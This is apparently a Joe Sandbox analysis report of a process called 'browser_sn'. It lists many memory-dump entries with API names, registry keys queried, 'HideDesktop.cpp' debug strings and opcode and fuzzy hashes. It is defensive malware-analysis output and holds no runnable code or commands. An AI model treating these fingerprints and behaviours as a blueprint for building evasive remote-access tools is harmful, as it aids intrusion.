                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                      • String ID:
                                                      • API String ID: 2426525106-0
                                                      • Opcode ID: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
                                                      • Instruction ID: 3636dd243e5ad42e68d324f14ad510c3fd9c22b9de95214c2cae5a471ec492e0
                                                      • Opcode Fuzzy Hash: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
                                                      • Instruction Fuzzy Hash: 1EF0DA62A64A4192EB64FF35EC510A8B334FF89F44BC05031C90D57365CF38E899C324
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: EnumDisplayDevicesA$USER32
                                                      • API String ID: 145871493-2970514552
                                                      • Opcode ID: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                      • Instruction ID: 704b5127b80ac72d71a78d349b4172f73d2421992529e52b8f53150a775a73bc
                                                      • Opcode Fuzzy Hash: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                      • Instruction Fuzzy Hash: C9319532629B8285EA74EB35B4546E9A2A0FF86754F944235DE9D03794EF3CF841C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: EnumDisplayDevicesA$USER32
                                                      • API String ID: 145871493-2970514552
                                                      • Opcode ID: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                      • Instruction ID: 287f685b6c245b117f5ae046f909f7bd88eb6995e8a6f8c8d09f2510fca91112
                                                      • Opcode Fuzzy Hash: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                      • Instruction Fuzzy Hash: DF319332628B8285EA71EB35E4446A9F3A0FF8AB94F940235DE9D03794EF3CE541C710
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: EnumDisplayDevicesA$USER32
                                                      • API String ID: 145871493-2970514552
                                                      • Opcode ID: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
                                                      • Instruction ID: 27ef8ba840b73955a6ab7153936544b6091fa7b77d6bf6f92d7a8cdc2f0cea47
                                                      • Opcode Fuzzy Hash: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
                                                      • Instruction Fuzzy Hash: F3319532628B8185EA70EB35E4546A9B7A0FFCAB94F940235DE9D03795EF3CE5418B10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: CSDVersion$Software\Microsoft\Windows NT\CurrentVersion
                                                      • API String ID: 3677997916-605553437
                                                      • Opcode ID: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
                                                      • Instruction ID: 6e5a9bc2f39314fe25845cfc2fad4a70fe52801a25a7fa55c376ef8747b2c5c3
                                                      • Opcode Fuzzy Hash: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
                                                      • Instruction Fuzzy Hash: 44316161A3968281EB709B30F4547AAB7A0FF46754F806232F6DE46B94DF2CE454CB20
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: EnumDisplayDevicesA$USER32
                                                      • API String ID: 145871493-2970514552
                                                      • Opcode ID: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                      • Instruction ID: 208c953037db22946e5f5df633745dd6d04cc7ecd960953127e70a906da64dd5
                                                      • Opcode Fuzzy Hash: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                      • Instruction Fuzzy Hash: F4218132B28B8182E770EF35A4446A9A3A5FF89794F850235DE9D43784EF3CE4018710
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressCreateFreeInfoInitializeInstanceLoadParametersProcSystem
                                                      • String ID: HideDesktop.cpp : Restorewallpaper %i$HideDesktop.cpp : Restorewallpaper %i %i$shell32.dll
                                                      • API String ID: 3848869850-2975526927
                                                      • Opcode ID: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                      • Instruction ID: 2348791309ee8b4c1544fab2cbeba3af704d9185d7826dbfe1c8875d9e9190ed
                                                      • Opcode Fuzzy Hash: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                      • Instruction Fuzzy Hash: AF115761E3910392FA78BB30E8116F5A7A1BF82704FC06435D04E023A1DE3DF619CBA1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: System\CurrentControlSet\Control\Terminal Server$TSAppCompat
                                                      • API String ID: 3677997916-252502655
                                                      • Opcode ID: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
                                                      • Instruction ID: 023a1d06142687f00f60df30680f6d09c358aa2a4e24ccb85b532d60f60d84e2
                                                      • Opcode Fuzzy Hash: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
                                                      • Instruction Fuzzy Hash: 1E015271638B8286EB609B31F44475AF7B4FB84798F801135E68D06B64DF7CE154CB10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Installed$System\WPA\MediaCenter
                                                      • API String ID: 3677997916-3461404619
                                                      • Opcode ID: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
                                                      • Instruction ID: 033e3a6f8711d5b966be74b605a14da37e491625c0a91708d468f3cd342d1c00
                                                      • Opcode Fuzzy Hash: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
                                                      • Instruction Fuzzy Hash: 8901FA72628B8282EB609B31F44479AF7B4FB84794F805135EA8E46B68DF3CE154CB14
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenValue
                                                      • String ID: Control Panel\Desktop$WallpaperStyle
                                                      • API String ID: 779948276-747434185
                                                      • Opcode ID: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
                                                      • Instruction ID: 4e8e3fef3330a7bf2ac3f3edd50be6ffdded4a31be51c53e052823c5c00e1d36
                                                      • Opcode Fuzzy Hash: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
                                                      • Instruction Fuzzy Hash: AA012135628B4182DB209B34F844555F3B0FB857A4F806331E96D43BE8DF2DE514CB00
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Desktop$WallpaperStyle
                                                      • API String ID: 3677997916-747434185
                                                      • Opcode ID: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
                                                      • Instruction ID: 574d9906d791d4152978e5e11699446495fbd0333c66951a7e4ca2f5bb43b0fc
                                                      • Opcode Fuzzy Hash: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
                                                      • Instruction Fuzzy Hash: EAF0CD35A28B4381EB209B34F454656A774FB85789FD02131EA8D07B64DF3DE155CB10
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _amsg_exit_errno_getptd_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 1050512615-0
                                                      • Opcode ID: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                      • Instruction ID: 7f53170730a08dfc97d6481e237037dbe02376450cb08e8bd520760d74473f03
                                                      • Opcode Fuzzy Hash: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                      • Instruction Fuzzy Hash: C571E652A2C28298F7716B7195621FCBBA46F03784F989631EF5D0679ACD2CF491C322
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FlushObjectSelect
                                                      • String ID:
                                                      • API String ID: 2071645339-0
                                                      • Opcode ID: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
                                                      • Instruction ID: 8bf180a7a07ef54ff3a1d1b7d6d657cdec32fb2966fb705b30f0abf444bcc3a7
                                                      • Opcode Fuzzy Hash: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
                                                      • Instruction Fuzzy Hash: 1E519376928A82AAE730AF35E0043AABBA0FF45744FA81136DA4D17759CF3CF540C721
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _lock$_errno_getptd_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 2808128820-0
                                                      • Opcode ID: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
                                                      • Instruction ID: 365eb1d9b7af76a6fc856d2c93be5534637d5a8d2c327d1e1a6509d45598a2af
                                                      • Opcode Fuzzy Hash: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
                                                      • Instruction Fuzzy Hash: 2A419D21A2964289F724BB31A9523FAA691BF46BC4FC00135EE0D477D6DF6CF842D721
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
